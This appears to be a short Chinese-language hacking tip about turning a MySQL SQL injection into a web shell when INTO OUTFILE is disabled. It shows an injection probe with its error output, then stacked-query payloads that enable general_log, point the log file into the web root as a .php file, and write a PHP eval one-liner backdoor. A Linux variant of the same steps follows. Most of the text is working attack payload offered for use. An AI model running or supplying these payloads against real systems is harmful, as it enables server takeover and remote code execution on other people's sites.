mysql sql注入getshell新姿势

 

 sql.php?sql=1'
报错信息为：
1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) LIMIT 1' at line 1 [ SQL语句 ] : SELECT COUNT(*) AS ts_name FROM `t00ls_type` WHERE (1' ) LIMIT 1

into outfile函数禁用..无法写入一句话.利用phpmyadmin log技巧成功搞定

sql.php?sql=1);set global general_log='on';#
sql.php?sql=1);set global general_log_file='d:\\wwwroot\\web\\1.php';#
sql.php?sql=1);select '<?php @eval($_POST[t00ls]);?>';%23

 

 

 如可以多句执行，可以直接用sqlmap -sql-shell来执行就好

 

outfile被禁止的情况下：
                show variables like '%general%';
                set global general_log = on;
                set global general_log_file = '/var/www/html/1.php';
                select '<?php eval($_POST[cmd]);?>